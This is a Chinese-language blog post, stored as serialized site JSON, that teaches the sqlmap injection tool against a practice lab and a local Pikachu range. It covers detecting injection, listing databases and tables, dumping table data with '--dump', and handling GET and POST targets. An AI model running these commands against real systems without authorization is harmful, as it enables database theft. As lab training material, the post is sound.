[{"data":1,"prerenderedAt":581},["ShallowReactive",2],{"post-2026-03-13-sqlmapguide":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"tags":11,"body":15,"_type":575,"_id":576,"_source":577,"_file":578,"_stem":579,"_extension":580},"\u002Fblog\u002F2026-03-13-sqlmapguide","blog",false,"","sqlmap 工具使用","sqlmap 自动化SQL注入工具使用教程，包含漏洞检测、数据库枚举、GET\u002FPOST请求实战案例。","2026-03-13",[12,13,14],"Kali","安全","SQL注入",{"type":16,"children":17,"toc":571},"root",[18,35,42,47,55,60,96,106,141,148,153,160,169,197,204,209,216,225,262,269,273,280,289,345,352,356,363,429,437,458,467,503,512,544,565],{"type":19,"tag":20,"props":21,"children":22},"element","blockquote",{},[23,30],{"type":19,"tag":24,"props":25,"children":26},"p",{},[27],{"type":28,"value":29},"text","sqlmap介绍",{"type":19,"tag":24,"props":31,"children":32},{},[33],{"type":28,"value":34},"sqlmap 是一款开源、自动化的SQL注入漏洞检测与利用工具，主要用于帮助安全测试人员、渗透测试工程师发现并验证Web应用程序中存在的SQL注入漏洞，进而评估漏洞可能带来的安全风险（如数据泄露、服务器控制权被夺取等）。它基于Python开发，支持多种数据库类型和注入技术，是Web安全领域最常用的工具之一。",{"type":19,"tag":36,"props":37,"children":39},"h3",{"id":38},"什么是sql注入",[40],{"type":28,"value":41},"什么是SQL注入",{"type":19,"tag":24,"props":43,"children":44},{},[45],{"type":28,"value":46},"由于Web应用程序对用户输入的数据合法性没有过滤或者判断，攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。",{"type":19,"tag":24,"props":48,"children":49},{},[50],{"type":19,"tag":51,"props":52,"children":54},"img",{"alt":7,"src":53},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260207105513000.png",[],{"type":19,"tag":36,"props":56,"children":58},{"id":57},"sqlmap实战",[59],{"type":28,"value":57},{"type":19,"tag":20,"props":61,"children":62},{},[63,68,89],{"type":19,"tag":24,"props":64,"children":65},{},[66],{"type":28,"value":67},"目标网站",{"type":19,"tag":24,"props":69,"children":70},{},[71,73,79,81],{"type":28,"value":72},"B站UP主(ID：",{"type":19,"tag":74,"props":75,"children":76},"strong",{},[77],{"type":28,"value":78},"2005814455",{"type":28,"value":80},")：",{"type":19,"tag":82,"props":83,"children":87},"a",{"href":84,"rel":85},"http:\u002F\u002Fa5fa4ee523e3.target.yijinglab.com\u002F",[86],"nofollow",[88],{"type":28,"value":84},{"type":19,"tag":90,"props":91,"children":93},"font",{"color":92},"red",[94],{"type":28,"value":95},"\n        不建议使用，建议自己搭建，后续我将使用皮卡丘靶场\n",{"type":19,"tag":97,"props":98,"children":99},"ol",{},[100],{"type":19,"tag":101,"props":102,"children":103},"li",{},[104],{"type":28,"value":105},"测试是否存在漏洞",{"type":19,"tag":107,"props":108,"children":112},"pre",{"className":109,"code":110,"language":111,"meta":7,"style":7},"language-bash shiki shiki-themes github-dark","sqlmap -u 测试网址\n","bash",[113],{"type":19,"tag":114,"props":115,"children":116},"code",{"__ignoreMap":7},[117],{"type":19,"tag":118,"props":119,"children":122},"span",{"class":120,"line":121},"line",1,[123,129,135],{"type":19,"tag":118,"props":124,"children":126},{"style":125},"--shiki-default:#B392F0",[127],{"type":28,"value":128},"sqlmap",{"type":19,"tag":118,"props":130,"children":132},{"style":131},"--shiki-default:#79B8FF",[133],{"type":28,"value":134}," -u",{"type":19,"tag":118,"props":136,"children":138},{"style":137},"--shiki-default:#9ECBFF",[139],{"type":28,"value":140}," 测试网址\n",{"type":19,"tag":24,"props":142,"children":143},{},[144],{"type":19,"tag":51,"props":145,"children":147},{"alt":7,"src":146},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260207114759731.png",[],{"type":19,"tag":24,"props":149,"children":150},{},[151],{"type":28,"value":152},"(若存在类似于以下的信息则表示存在注入漏洞)",{"type":19,"tag":24,"props":154,"children":155},{},[156],{"type":19,"tag":51,"props":157,"children":159},{"alt":7,"src":158},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260207115133507.png",[],{"type":19,"tag":97,"props":161,"children":163},{"start":162},2,[164],{"type":19,"tag":101,"props":165,"children":166},{},[167],{"type":28,"value":168},"测试当前的数据库名字",{"type":19,"tag":107,"props":170,"children":172},{"className":109,"code":171,"language":111,"meta":7,"style":7},"sqlmap -u 测试网址 --dbs\n",[173],{"type":19,"tag":114,"props":174,"children":175},{"__ignoreMap":7},[176],{"type":19,"tag":118,"props":177,"children":178},{"class":120,"line":121},[179,183,187,192],{"type":19,"tag":118,"props":180,"children":181},{"style":125},[182],{"type":28,"value":128},{"type":19,"tag":118,"props":184,"children":185},{"style":131},[186],{"type":28,"value":134},{"type":19,"tag":118,"props":188,"children":189},{"style":137},[190],{"type":28,"value":191}," 测试网址",{"type":19,"tag":118,"props":193,"children":194},{"style":131},[195],{"type":28,"value":196}," --dbs\n",{"type":19,"tag":24,"props":198,"children":199},{},[200],{"type":19,"tag":51,"props":201,"children":203},{"alt":7,"src":202},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260207115505172.png",[],{"type":19,"tag":24,"props":205,"children":206},{},[207],{"type":28,"value":208},"(此处为最终获取到的结果)",{"type":19,"tag":24,"props":210,"children":211},{},[212],{"type":19,"tag":51,"props":213,"children":215},{"alt":7,"src":214},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260207115607782.png",[],{"type":19,"tag":97,"props":217,"children":219},{"start":218},3,[220],{"type":19,"tag":101,"props":221,"children":222},{},[223],{"type":28,"value":224},"测试指定数据库中的数据表的信息",{"type":19,"tag":107,"props":226,"children":228},{"className":109,"code":227,"language":111,"meta":7,"style":7},"sqlmap -u 测试网址 -D 数据库名 --tables\n",[229],{"type":19,"tag":114,"props":230,"children":231},{"__ignoreMap":7},[232],{"type":19,"tag":118,"props":233,"children":234},{"class":120,"line":121},[235,239,243,247,252,257],{"type":19,"tag":118,"props":236,"children":237},{"style":125},[238],{"type":28,"value":128},{"type":19,"tag":118,"props":240,"children":241},{"style":131},[242],{"type":28,"value":134},{"type":19,"tag":118,"props":244,"children":245},{"style":137},[246],{"type":28,"value":191},{"type":19,"tag":118,"props":248,"children":249},{"style":131},[250],{"type":28,"value":251}," -D",{"type":19,"tag":118,"props":253,"children":254},{"style":137},[255],{"type":28,"value":256}," 数据库名",{"type":19,"tag":118,"props":258,"children":259},{"style":131},[260],{"type":28,"value":261}," --tables\n",{"type":19,"tag":24,"props":263,"children":264},{},[265],{"type":19,"tag":51,"props":266,"children":268},{"alt":7,"src":267},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260207161902753.png",[],{"type":19,"tag":24,"props":270,"children":271},{},[272],{"type":28,"value":208},{"type":19,"tag":24,"props":274,"children":275},{},[276],{"type":19,"tag":51,"props":277,"children":279},{"alt":7,"src":278},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260207161950889.png",[],{"type":19,"tag":97,"props":281,"children":283},{"start":282},4,[284],{"type":19,"tag":101,"props":285,"children":286},{},[287],{"type":28,"value":288},"测试指定数据表中的数据（此处我使用的自己部署的pikachu靶场）",{"type":19,"tag":107,"props":290,"children":292},{"className":109,"code":291,"language":111,"meta":7,"style":7},"sqlmap -u 测试网址 -D 数据库名 -T 数据表名 [-C 字段名1,字段名2,...] --dump\n",[293],{"type":19,"tag":114,"props":294,"children":295},{"__ignoreMap":7},[296],{"type":19,"tag":118,"props":297,"children":298},{"class":120,"line":121},[299,303,307,311,315,319,324,329,335,340],{"type":19,"tag":118,"props":300,"children":301},{"style":125},[302],{"type":28,"value":128},{"type":19,"tag":118,"props":304,"children":305},{"style":131},[306],{"type":28,"value":134},{"type":19,"tag":118,"props":308,"children":309},{"style":137},[310],{"type":28,"value":191},{"type":19,"tag":118,"props":312,"children":313},{"style":131},[314],{"type":28,"value":251},{"type":19,"tag":118,"props":316,"children":317},{"style":137},[318],{"type":28,"value":256},{"type":19,"tag":118,"props":320,"children":321},{"style":131},[322],{"type":28,"value":323}," -T",{"type":19,"tag":118,"props":325,"children":326},{"style":137},[327],{"type":28,"value":328}," 数据表名",{"type":19,"tag":118,"props":330,"children":332},{"style":331},"--shiki-default:#E1E4E8",[333],{"type":28,"value":334}," [-C ",{"type":19,"tag":118,"props":336,"children":337},{"style":137},[338],{"type":28,"value":339},"字段名1,字段名2,...]",{"type":19,"tag":118,"props":341,"children":342},{"style":131},[343],{"type":28,"value":344}," --dump\n",{"type":19,"tag":24,"props":346,"children":347},{},[348],{"type":19,"tag":51,"props":349,"children":351},{"alt":7,"src":350},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208101030974.png",[],{"type":19,"tag":24,"props":353,"children":354},{},[355],{"type":28,"value":208},{"type":19,"tag":24,"props":357,"children":358},{},[359],{"type":19,"tag":51,"props":360,"children":362},{"alt":7,"src":361},"\u002Fimages\u002Fblog\u002Fkali\u002Ffile-20260208100930513.png",[],{"type":19,"tag":20,"props":364,"children":365},{},[366,371,383],{"type":19,"tag":24,"props":367,"children":368},{},[369],{"type":28,"value":370},"扫描缓存",{"type":19,"tag":24,"props":372,"children":373},{},[374,376,381],{"type":28,"value":375},"sqlmap扫描重复检测出已修复的漏洞，大概率是",{"type":19,"tag":74,"props":377,"children":378},{},[379],{"type":28,"value":380},"缓存\u002F扫描配置残留或修复未彻底",{"type":28,"value":382},"导致的。",{"type":19,"tag":97,"props":384,"children":385},{},[386,399,418],{"type":19,"tag":101,"props":387,"children":388},{},[389,391,397],{"type":28,"value":390},"扫描命令后直接添加 ",{"type":19,"tag":114,"props":392,"children":394},{"className":393},[],[395],{"type":28,"value":396},"--flush-session",{"type":28,"value":398}," 可以强制清空当前目标的会话缓存，且本次扫描不缓存",{"type":19,"tag":101,"props":400,"children":401},{},[402,404,410,412],{"type":28,"value":403},"Linux\u002FKali(彻底删除缓存目录)",{"type":19,"tag":114,"props":405,"children":407},{"className":406},[],[408],{"type":28,"value":409},"\u002F.local\u002Fshare\u002Fsqlmap\u002F",{"type":28,"value":411},"或",{"type":19,"tag":114,"props":413,"children":415},{"className":414},[],[416],{"type":28,"value":417},"\u002Fusr\u002Fshare\u002Fsqlmap\u002Fdata\u002F",{"type":19,"tag":101,"props":419,"children":420},{},[421,423],{"type":28,"value":422},"Kali中可以使用命令一键删除：",{"type":19,"tag":114,"props":424,"children":426},{"className":425},[],[427],{"type":28,"value":428},"rm -rf ~\u002F.local\u002Fshare\u002Fsqlmap\u002F*",{"type":19,"tag":24,"props":430,"children":431},{},[432],{"type":19,"tag":74,"props":433,"children":434},{},[435],{"type":28,"value":436},"常错雷区",{"type":19,"tag":24,"props":438,"children":439},{},[440,442,448,450,456],{"type":28,"value":441},"注意区分 ",{"type":19,"tag":114,"props":443,"children":445},{"className":444},[],[446],{"type":28,"value":447},"GET",{"type":28,"value":449}," 请求和 ",{"type":19,"tag":114,"props":451,"children":453},{"className":452},[],[454],{"type":28,"value":455},"POST",{"type":28,"value":457}," 请求，它们的请求方式不同，以我的pikachu靶场为例：",{"type":19,"tag":24,"props":459,"children":460},{},[461],{"type":19,"tag":114,"props":462,"children":464},{"className":463},[],[465],{"type":28,"value":466},".\u002Fpikachu\u002Fvul\u002Fsqli\u002Fsqli_str.php",{"type":19,"tag":468,"props":469,"children":470},"ul",{},[471,481,492],{"type":19,"tag":101,"props":472,"children":473},{},[474,476],{"type":28,"value":475},"请求方式：",{"type":19,"tag":114,"props":477,"children":479},{"className":478},[],[480],{"type":28,"value":447},{"type":19,"tag":101,"props":482,"children":483},{},[484,486],{"type":28,"value":485},"请求参数：",{"type":19,"tag":114,"props":487,"children":489},{"className":488},[],[490],{"type":28,"value":491},"name=...&submit=查询",{"type":19,"tag":101,"props":493,"children":494},{},[495,497],{"type":28,"value":496},"sqlmap扫描命令：",{"type":19,"tag":114,"props":498,"children":500},{"className":499},[],[501],{"type":28,"value":502},"sqlmap -u \"http:\u002F\u002F192.168.1.12:8888\u002Fpikachu\u002Fvul\u002Fsqli\u002Fsqli_str.php?name=zhangsan&submit=查询\" --flush-session",{"type":19,"tag":24,"props":504,"children":505},{},[506],{"type":19,"tag":114,"props":507,"children":509},{"className":508},[],[510],{"type":28,"value":511},".\u002Fpikachu\u002Fvul\u002Fsqli\u002Fsqli_id.php",{"type":19,"tag":468,"props":513,"children":514},{},[515,524,534],{"type":19,"tag":101,"props":516,"children":517},{},[518,519],{"type":28,"value":475},{"type":19,"tag":114,"props":520,"children":522},{"className":521},[],[523],{"type":28,"value":455},{"type":19,"tag":101,"props":525,"children":526},{},[527,528],{"type":28,"value":485},{"type":19,"tag":114,"props":529,"children":531},{"className":530},[],[532],{"type":28,"value":533},"id=...&submit=查询",{"type":19,"tag":101,"props":535,"children":536},{},[537,538],{"type":28,"value":496},{"type":19,"tag":114,"props":539,"children":541},{"className":540},[],[542],{"type":28,"value":543},"sqlmap -u \"http:\u002F\u002F192.168.1.12:8888\u002Fpikachu\u002Fvul\u002Fsqli\u002Fsqli_id.php\" --data \"id=5&submit=查询\" --flush-session",{"type":19,"tag":20,"props":545,"children":546},{},[547,552],{"type":19,"tag":24,"props":548,"children":549},{},[550],{"type":28,"value":551},"提示",{"type":19,"tag":24,"props":553,"children":554},{},[555,557,563],{"type":28,"value":556},"此处的 ",{"type":19,"tag":114,"props":558,"children":560},{"className":559},[],[561],{"type":28,"value":562},"192.168.1.12:8888",{"type":28,"value":564}," 为我本地的pikachu靶场地址，扫描时更换为自己的既可",{"type":19,"tag":566,"props":567,"children":568},"style",{},[569],{"type":28,"value":570},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":162,"depth":162,"links":572},[573,574],{"id":38,"depth":218,"text":41},{"id":57,"depth":218,"text":57},"markdown","content:blog:2026-03-13-SqlmapGuide.md","content","blog\u002F2026-03-13-SqlmapGuide.md","blog\u002F2026-03-13-SqlmapGuide","md",1780801017580]